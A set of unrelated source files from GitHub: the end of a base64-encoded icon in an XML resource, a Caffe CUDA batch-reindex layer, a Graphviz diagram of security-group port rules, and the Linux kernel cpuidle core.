KP8GxSr/Bcgr/wXKLf8FzC7/Bc8v/wTRMf8E0zL/BNUz/wTXNP8E2DX/BNk1/wPaNv8D2zf/A9s3/wPc
N/8D2zf/A9s3/wPaNv8E2TX/BNg1/wTXNP8E1TP/BNMy/wTRMf8Fzy//Bcwu/wXKLf8FyCv/BsUq/wbD
KP8GwCb/B70l/we7I/8HuCH/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLMf/we2
IP8HuCL/B7sk/we+Jf8GwSf/BsMo/wbGKv8FyCv/Bcot/wXMLv8Fzi//BdAw/wTSMf8E1DL/BNUz/wTW
NP8E1zT/BNg1/wTYNf8E2DX/BNg1/wTYNf8E1zT/BNY0/wTVM/8E1DL/BNIx/wXQMP8Fzi//Bcwu/wXK
Lf8FyCv/BsYq/wbDKP8GwSf/B74l/we7JP8HuSL/B7Yg/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAixHv8ItB//B7ch/we5Iv8HvCT/Br8m/wbBJ/8Gwyj/BsYq/wbHK/8Fyiz/Bcwt/wXN
Lv8Fzy//BNEw/wTSMf8E0zL/BNQy/wTUMv8E1TP/BNUz/wTVM/8E1DL/BNQy/wTTMv8E0jH/BNEw/wXP
L/8Fzi//Bcwt/wXKLP8Gxyv/BsYq/wbDKP8GwSf/Br8m/we8JP8HuSL/B7ch/wi0H/8AAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLIe/wi1IP8HtyH/B7oj/we9JP8Gvyb/BsEn/wbD
KP8GxSr/Bscr/wXJLP8Fyy3/Bcwu/wXOL/8Fzy//BdAw/wTRMP8E0TH/BNIx/wTSMf8E0jH/BNEx/wTR
MP8F0DD/Bc8v/wXOL/8FzC7/Bcst/wXJLP8Gxyv/BsUq/wbDKP8GwSf/Br8m/we9JP8HuiP/B7ch/wi1
IP8Ish7/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiwHf8Isx7/CLUg/we4
If8HuiP/B7wk/wa/Jv8GwSf/BsMo/wbFKf8Gxir/Bcgr/wXJLP8Fyy3/Bcwt/wXNLv8Fzi//Bc4v/wXO
L/8Fzi//Bc4v/wXOL/8Fzi//Bc0u/wXMLf8Fyy3/Bcks/wXIK/8Gxir/BsUp/wbDKP8GwSf/Br8m/we8
JP8HuiP/B7gh/wi1IP8Isx//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAACLAd/wizH/8ItSD/B7gh/we6I/8HvCT/B74l/wbAJv8Gwif/BsMo/wbFKf8Gxir/Bcgr/wXJ
LP8FySz/Bcot/wXLLf8Fyy3/Bcst/wXLLf8Fyy3/Bcot/wXJLP8FySz/Bcgr/wbGKv8GxSr/BsMo/wbC
J/8GwCb/B74l/we8JP8HuiP/B7gh/wi1IP8Isx//CLEd/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIsR7/CLMf/we2IP8HuCH/B7oj/we8JP8HvSX/Br8m/wbB
J/8Gwij/BsQp/wbFKf8Gxir/Bscq/wbHK/8FyCv/Bcgr/wXIK/8FyCv/Bcgr/wbHK/8Gxyr/BsYq/wbF
Kf8GxCn/BsIo/wbBJ/8Gvyb/B70l/we8JP8HuiP/B7gh/we2IP8Isx//CLEe/wAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAixHf8Isx//CLUg/we3
If8HuSL/B7sj/we8JP8HviX/Br8m/wbAJ/8Gwif/BsIo/wbDKP8GxCn/BsQp/wbFKf8GxSn/BsUp/wbE
Kf8GxCn/BsMo/wbDKP8Gwif/BsAn/wa/Jv8HviX/B7wk/we7I/8HuSL/B7ch/wi1IP8Isx//AAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAiyHv8ItB//B7Yh/we4If8HuSL/B7sj/we8JP8HvSX/B74l/wa/Jv8GwCf/BsEn/wbB
J/8GwSf/BsEn/wbBJ/8GwSf/BsEn/wbAJ/8Gvyb/B74l/we9Jf8HvCT/B7sj/we5Iv8HuCH/B7Yh/wi0
H/8Ish7/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLEe/wizH/8ItSD/B7Yh/we4If8HuSL/B7oj/we7
JP8HvCT/B70k/we9Jf8HviX/B74l/we+Jf8HviX/B74l/we9Jf8HvST/B7wk/we7JP8HuiP/B7ki/we4
If8HtiH/CLUg/wizH/8IsR7/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIsR3/CLIe/wi0
H/8ItSD/B7Yh/we3If8HuCL/B7ki/we6I/8HuiP/B7sj/we7JP8HuyT/B7sk/we7I/8HuiP/B7oj/we5
Iv8HuCL/B7ch/we2If8ItSD/CLQf/wiyHv8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAuZ
D/8KmhD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACqEU/wqhFP8KoRT/CqEU/wAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACpoQ/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAC5cO/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//4AP8A//////gA/gB/////+AD+AH/////4AP4A//////gA/gD
/////+AD+AP/////4AP4A//////gA/gD/////0AD+AP////8AAP4Af////gAA/AB////8AAD8AHH///w
AAPwAeH///AAA/AB8f//8AAD8AHw///gAAHgATD//8AAAeABMP//wAAAwAEA///AAAAAAwD//8AwAAAD
gH//4DgAAAOAf//AfAAAA8B//8B8AAADwH//wHwAAAHAf//AeAAAAcB//8A4AAADgH//wBgAAAMAf//A
DAAABgB//8AMAAAGAH//wA8AAA4Af//ADwAAPgB//8APAAAeAH//4A8AAB4Af//gDwAAHAD///AGAAAI
AP//8AQAAAAB///4AAAAAAH///gAAAAAAf//+AAAAAAB///4AAAAAAH///gAAAAAAf//+AAAAAAD///4
AAAAAAf///gAAAAAB///+AAAAAAH///4AAAAAAf///wAAAAAB////AAAAAAP///+AAAAAA////8AAAAA
H////4AAAAB/////4AAAAP/////wAAAB//////gAAAf/////+AAAA//////wAAAB//////AAAAH/////
8cAAcf/////x4AD5//////HwA/v/////+fwH+//////5/w/3//////3/////////////////
</value>
</data>
</root> | {
"pile_set_name": "Github"
} |
#include <algorithm>
#include <utility>
#include <vector>
#include "caffe/layers/batch_reindex_layer.hpp"
#include "caffe/util/math_functions.hpp"
namespace caffe {
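// Forward kernel: each output element at batch position n copies the corresponding
// value from the input batch row selected by permut[n].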
template<typename Dtype>
__global__ void BRForward(const int count, const int inner_dim, const Dtype* in,
const Dtype* permut, Dtype* out) {
CUDA_KERNEL_LOOP(index, count) {
int n = index / (inner_dim);
int in_n = static_cast<int>(permut[n]);
out[index] = in[in_n * (inner_dim) + index % (inner_dim)];
}
}
template<typename Dtype>
void BatchReindexLayer<Dtype>::Forward_gpu(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top) {
check_batch_reindex(bottom[0]->shape(0), bottom[1]->count(),
bottom[1]->cpu_data());
if (top[0]->count() == 0) {
return;
}
int threads = top[0]->count();
// NOLINT_NEXT_LINE(whitespace/operators)
BRForward<Dtype> <<<CAFFE_GET_BLOCKS(threads), CAFFE_CUDA_NUM_THREADS>>>(
top[0]->count(), bottom[0]->count() / bottom[0]->shape(0),
bottom[0]->gpu_data(), bottom[1]->gpu_data(), top[0]->mutable_gpu_data());
CUDA_POST_KERNEL_CHECK;
}
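// Backward kernel: each bottom-diff element accumulates the top diffs of every row
// that was copied from its batch position, walking the begins/counts index lists
// prepared on the CPU in Backward_gpu below.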
template<typename Dtype>
__global__ void BRBackward(const int count, const int inner_dim,
const Dtype* in, const Dtype* top_indexes,
const Dtype* begins, const Dtype* counts,
Dtype* out) {
CUDA_KERNEL_LOOP(index, count) {
int n = index / (inner_dim);
out[index] = 0;
int lower = static_cast<int>(begins[n]);
int upper = lower + static_cast<int>(counts[n]);
for (int i = lower; i < upper; ++i) {
int in_n = static_cast<int>(top_indexes[i]);
out[index] += in[in_n * (inner_dim) + index % (inner_dim)];
}
}
}
template<typename Dtype>
void BatchReindexLayer<Dtype>::Backward_gpu(
const vector<Blob<Dtype>*>& top, const vector<bool>& propagate_down,
const vector<Blob<Dtype>*>& bottom) {
CHECK(!propagate_down[1]) << "Cannot backprop to index.";
if (!propagate_down[0]) {
return;
}
vector<std::pair<int, int> > mapping;
const Dtype* perm = bottom[1]->cpu_data();
for (int i = 0; i < bottom[1]->count(); ++i) {
mapping.push_back(pair<int, int>(static_cast<int>(perm[i]), i));
}
std::sort(mapping.begin(), mapping.end(), pair_sort_first());
// Each element of the bottom diff is potentially the sum of many top diffs.
// However, we'd like each CUDA thread to handle exactly one output. Hence,
// we first pre-compute a list of lists of indices that need to be summed for
// each output. `top_indexes` holds the data of this list of lists. The
// k'th element of `begins` points to the location in `top_indexes` where the
  // list for the k'th example begins, and the k'th element of `counts` is the
// length of that list.
vector<int> shape;
shape.push_back(bottom[1]->count());
Blob<Dtype> top_indexes(shape);
shape[0] = bottom[0]->shape(0);
Blob<Dtype> counts(shape);
Blob<Dtype> begins(shape);
Dtype* t_i_data = top_indexes.mutable_cpu_data();
Dtype* c_data = counts.mutable_cpu_data();
Dtype* b_data = begins.mutable_cpu_data();
caffe_set(begins.count(), Dtype(-1), b_data);
caffe_set(counts.count(), Dtype(0), c_data);
for (int i = 0; i < mapping.size(); ++i) {
t_i_data[i] = mapping[i].second;
if (b_data[mapping[i].first] == -1) {
b_data[mapping[i].first] = i;
}
c_data[mapping[i].first] += 1;
}
int threads = bottom[0]->count();
// NOLINT_NEXT_LINE(whitespace/operators)
BRBackward<Dtype> <<<CAFFE_GET_BLOCKS(threads), CAFFE_CUDA_NUM_THREADS>>>(
bottom[0]->count(), bottom[0]->count() / bottom[0]->shape(0),
top[0]->gpu_diff(), top_indexes.gpu_data(), begins.gpu_data(),
counts.gpu_data(), bottom[0]->mutable_gpu_diff());
CUDA_POST_KERNEL_CHECK;
}
INSTANTIATE_LAYER_GPU_FUNCS(BatchReindexLayer);
} // namespace caffe
| {
"pile_set_name": "Github"
} |
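// Pre-laid-out Graphviz graph (bb/pos attributes already computed); edges are labelled
// with a port/protocol (e.g. app -> db on 5984/tcp), in the style of an allowed-traffic
// / security-group diagram.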
digraph G {
graph [bb="0,0,388.31,144",
concentrate=true,
overlap=false,
rankdir=LR,
sep=1,
splines=true
];
node [label="\N"];
app [height=0.5,
label=app,
pos="222.32,72",
width=0.75];
db [height=0.5,
label=db,
pos="361.31,72",
width=0.75];
app -> db [color=blue,
label="5984/tcp",
lp="291.81,79",
pos="e,334.25,72 249.45,72 270.68,72 300.46,72 323.95,72",
style=bold];
"8.8.8.8/32" [height=0.5,
label="8.8.8.8/32",
pos="62.161,126",
width=1.2702];
"8.8.8.8/32" -> app [color=blue,
label="80/tcp",
lp="159.82,108",
pos="e,199.09,81.689 98.964,115.29 121.69,108.48 151.36,99.231 177.32,90 181.33,88.572 185.52,87.006 189.65,85.41",
style=bold];
"amazon-elb-sg" [height=0.5,
label="amazon-elb-sg",
pos="62.161,72",
width=1.7267];
"amazon-elb-sg" -> app [color=blue,
label="80/tcp",
lp="159.82,79",
pos="e,195.01,72 124.54,72 144.95,72 166.98,72 184.95,72",
style=bold];
"*" [height=0.5,
label="*",
pos="62.161,18",
width=0.75];
"*" -> app [color=blue,
label="22/tcp",
lp="159.82,61",
pos="e,199.09,62.311 87.055,25.175 110.5,32.076 146.53,43.049 177.32,54 181.33,55.428 185.52,56.994 189.65,58.59",
style=bold];
}
| {
"pile_set_name": "Github"
} |
/*
* cpuidle.c - core cpuidle infrastructure
*
* (C) 2006-2007 Venkatesh Pallipadi <[email protected]>
* Shaohua Li <[email protected]>
* Adam Belay <[email protected]>
*
* This code is licenced under the GPL.
*/
#include <linux/kernel.h>
#include <linux/mutex.h>
#include <linux/sched.h>
#include <linux/notifier.h>
#include <linux/pm_qos_params.h>
#include <linux/cpu.h>
#include <linux/cpuidle.h>
#include <linux/ktime.h>
#include <linux/hrtimer.h>
#include <trace/events/power.h>
#include "cpuidle.h"
DEFINE_PER_CPU(struct cpuidle_device *, cpuidle_devices);
DEFINE_MUTEX(cpuidle_lock);
LIST_HEAD(cpuidle_detected_devices);
static void (*pm_idle_old)(void);
static int enabled_devices;
#if defined(CONFIG_ARCH_HAS_CPU_IDLE_WAIT)
static void cpuidle_kick_cpus(void)
{
cpu_idle_wait();
}
#elif defined(CONFIG_SMP)
# error "Arch needs cpu_idle_wait() equivalent here"
#else /* !CONFIG_ARCH_HAS_CPU_IDLE_WAIT && !CONFIG_SMP */
static void cpuidle_kick_cpus(void) {}
#endif
static int __cpuidle_register_device(struct cpuidle_device *dev);
/**
* cpuidle_idle_call - the main idle loop
*
* NOTE: no locks or semaphores should be used here
*/
static void cpuidle_idle_call(void)
{
struct cpuidle_device *dev = __get_cpu_var(cpuidle_devices);
struct cpuidle_state *target_state;
int next_state;
/* check if the device is ready */
if (!dev || !dev->enabled) {
if (pm_idle_old)
pm_idle_old();
else
#if defined(CONFIG_ARCH_HAS_DEFAULT_IDLE)
default_idle();
#else
local_irq_enable();
#endif
return;
}
/*
* Call the device's prepare function before calling the
* governor's select function. ->prepare gives the device's
* cpuidle driver a chance to update any dynamic information
* of its cpuidle states for the current idle period, e.g.
* state availability, latencies, residencies, etc.
*/
if (dev->prepare)
dev->prepare(dev);
/* ask the governor for the next state */
next_state = cpuidle_curr_governor->select(dev);
if (need_resched()) {
local_irq_enable();
return;
}
target_state = &dev->states[next_state];
/* enter the state and update stats */
dev->last_state = target_state;
dev->last_residency = target_state->enter(dev, target_state);
if (dev->last_state)
target_state = dev->last_state;
target_state->time += (unsigned long long)dev->last_residency;
target_state->usage++;
/* give the governor an opportunity to reflect on the outcome */
if (cpuidle_curr_governor->reflect)
cpuidle_curr_governor->reflect(dev);
trace_power_end(smp_processor_id());
}
/**
* cpuidle_install_idle_handler - installs the cpuidle idle loop handler
*/
void cpuidle_install_idle_handler(void)
{
if (enabled_devices && (pm_idle != cpuidle_idle_call)) {
/* Make sure all changes finished before we switch to new idle */
smp_wmb();
pm_idle = cpuidle_idle_call;
}
}
/**
* cpuidle_uninstall_idle_handler - uninstalls the cpuidle idle loop handler
*/
void cpuidle_uninstall_idle_handler(void)
{
if (enabled_devices && pm_idle_old && (pm_idle != pm_idle_old)) {
pm_idle = pm_idle_old;
cpuidle_kick_cpus();
}
}
/**
* cpuidle_pause_and_lock - temporarily disables CPUIDLE
*/
void cpuidle_pause_and_lock(void)
{
mutex_lock(&cpuidle_lock);
cpuidle_uninstall_idle_handler();
}
EXPORT_SYMBOL_GPL(cpuidle_pause_and_lock);
/**
* cpuidle_resume_and_unlock - resumes CPUIDLE operation
*/
void cpuidle_resume_and_unlock(void)
{
cpuidle_install_idle_handler();
mutex_unlock(&cpuidle_lock);
}
EXPORT_SYMBOL_GPL(cpuidle_resume_and_unlock);
#ifdef CONFIG_ARCH_HAS_CPU_RELAX
static int poll_idle(struct cpuidle_device *dev, struct cpuidle_state *st)
{
ktime_t t1, t2;
s64 diff;
int ret;
t1 = ktime_get();
local_irq_enable();
while (!need_resched())
cpu_relax();
t2 = ktime_get();
diff = ktime_to_us(ktime_sub(t2, t1));
if (diff > INT_MAX)
diff = INT_MAX;
ret = (int) diff;
return ret;
}
static void poll_idle_init(struct cpuidle_device *dev)
{
struct cpuidle_state *state = &dev->states[0];
cpuidle_set_statedata(state, NULL);
snprintf(state->name, CPUIDLE_NAME_LEN, "C0");
snprintf(state->desc, CPUIDLE_DESC_LEN, "CPUIDLE CORE POLL IDLE");
state->exit_latency = 0;
state->target_residency = 0;
state->power_usage = -1;
state->flags = CPUIDLE_FLAG_POLL;
state->enter = poll_idle;
}
#else
static void poll_idle_init(struct cpuidle_device *dev) {}
#endif /* CONFIG_ARCH_HAS_CPU_RELAX */
/**
* cpuidle_enable_device - enables idle PM for a CPU
* @dev: the CPU
*
* This function must be called between cpuidle_pause_and_lock and
* cpuidle_resume_and_unlock when used externally.
*/
int cpuidle_enable_device(struct cpuidle_device *dev)
{
int ret, i;
if (dev->enabled)
return 0;
if (!cpuidle_get_driver() || !cpuidle_curr_governor)
return -EIO;
if (!dev->state_count)
return -EINVAL;
if (dev->registered == 0) {
ret = __cpuidle_register_device(dev);
if (ret)
return ret;
}
poll_idle_init(dev);
if ((ret = cpuidle_add_state_sysfs(dev)))
return ret;
if (cpuidle_curr_governor->enable &&
(ret = cpuidle_curr_governor->enable(dev)))
goto fail_sysfs;
for (i = 0; i < dev->state_count; i++) {
dev->states[i].usage = 0;
dev->states[i].time = 0;
}
dev->last_residency = 0;
dev->last_state = NULL;
smp_wmb();
dev->enabled = 1;
enabled_devices++;
return 0;
fail_sysfs:
cpuidle_remove_state_sysfs(dev);
return ret;
}
EXPORT_SYMBOL_GPL(cpuidle_enable_device);
/**
* cpuidle_disable_device - disables idle PM for a CPU
* @dev: the CPU
*
* This function must be called between cpuidle_pause_and_lock and
* cpuidle_resume_and_unlock when used externally.
*/
void cpuidle_disable_device(struct cpuidle_device *dev)
{
if (!dev->enabled)
return;
if (!cpuidle_get_driver() || !cpuidle_curr_governor)
return;
dev->enabled = 0;
if (cpuidle_curr_governor->disable)
cpuidle_curr_governor->disable(dev);
cpuidle_remove_state_sysfs(dev);
enabled_devices--;
}
EXPORT_SYMBOL_GPL(cpuidle_disable_device);
/**
* __cpuidle_register_device - internal register function called before register
* and enable routines
* @dev: the cpu
*
* cpuidle_lock mutex must be held before this is called
*/
static int __cpuidle_register_device(struct cpuidle_device *dev)
{
int ret;
struct sys_device *sys_dev = get_cpu_sysdev((unsigned long)dev->cpu);
struct cpuidle_driver *cpuidle_driver = cpuidle_get_driver();
if (!sys_dev)
return -EINVAL;
if (!try_module_get(cpuidle_driver->owner))
return -EINVAL;
init_completion(&dev->kobj_unregister);
/*
* cpuidle driver should set the dev->power_specified bit
* before registering the device if the driver provides
* power_usage numbers.
*
* For those devices whose ->power_specified is not set,
* we fill in power_usage with decreasing values as the
* cpuidle code has an implicit assumption that state Cn
* uses less power than C(n-1).
*
* With CONFIG_ARCH_HAS_CPU_RELAX, C0 is already assigned
	 * a power value of -1. So we use -2, -3, etc, for other
* c-states.
*/
if (!dev->power_specified) {
int i;
for (i = CPUIDLE_DRIVER_STATE_START; i < dev->state_count; i++)
dev->states[i].power_usage = -1 - i;
}
per_cpu(cpuidle_devices, dev->cpu) = dev;
list_add(&dev->device_list, &cpuidle_detected_devices);
if ((ret = cpuidle_add_sysfs(sys_dev))) {
module_put(cpuidle_driver->owner);
return ret;
}
dev->registered = 1;
return 0;
}
/**
* cpuidle_register_device - registers a CPU's idle PM feature
* @dev: the cpu
*/
int cpuidle_register_device(struct cpuidle_device *dev)
{
int ret;
mutex_lock(&cpuidle_lock);
if ((ret = __cpuidle_register_device(dev))) {
mutex_unlock(&cpuidle_lock);
return ret;
}
cpuidle_enable_device(dev);
cpuidle_install_idle_handler();
mutex_unlock(&cpuidle_lock);
return 0;
}
EXPORT_SYMBOL_GPL(cpuidle_register_device);
/**
* cpuidle_unregister_device - unregisters a CPU's idle PM feature
* @dev: the cpu
*/
void cpuidle_unregister_device(struct cpuidle_device *dev)
{
struct sys_device *sys_dev = get_cpu_sysdev((unsigned long)dev->cpu);
struct cpuidle_driver *cpuidle_driver = cpuidle_get_driver();
if (dev->registered == 0)
return;
cpuidle_pause_and_lock();
cpuidle_disable_device(dev);
cpuidle_remove_sysfs(sys_dev);
list_del(&dev->device_list);
wait_for_completion(&dev->kobj_unregister);
per_cpu(cpuidle_devices, dev->cpu) = NULL;
cpuidle_resume_and_unlock();
module_put(cpuidle_driver->owner);
}
EXPORT_SYMBOL_GPL(cpuidle_unregister_device);
#ifdef CONFIG_SMP
static void smp_callback(void *v)
{
/* we already woke the CPU up, nothing more to do */
}
/*
* This function gets called when a part of the kernel has a new latency
* requirement. This means we need to get all processors out of their C-state,
* and then recalculate a new suitable C-state. Just do a cross-cpu IPI; that
* wakes them all right up.
*/
static int cpuidle_latency_notify(struct notifier_block *b,
unsigned long l, void *v)
{
smp_call_function(smp_callback, NULL, 1);
return NOTIFY_OK;
}
static struct notifier_block cpuidle_latency_notifier = {
.notifier_call = cpuidle_latency_notify,
};
static inline void latency_notifier_init(struct notifier_block *n)
{
pm_qos_add_notifier(PM_QOS_CPU_DMA_LATENCY, n);
}
#else /* CONFIG_SMP */
#define latency_notifier_init(x) do { } while (0)
#endif /* CONFIG_SMP */
/**
* cpuidle_init - core initializer
*/
static int __init cpuidle_init(void)
{
int ret;
pm_idle_old = pm_idle;
ret = cpuidle_add_class_sysfs(&cpu_sysdev_class);
if (ret)
return ret;
latency_notifier_init(&cpuidle_latency_notifier);
return 0;
}
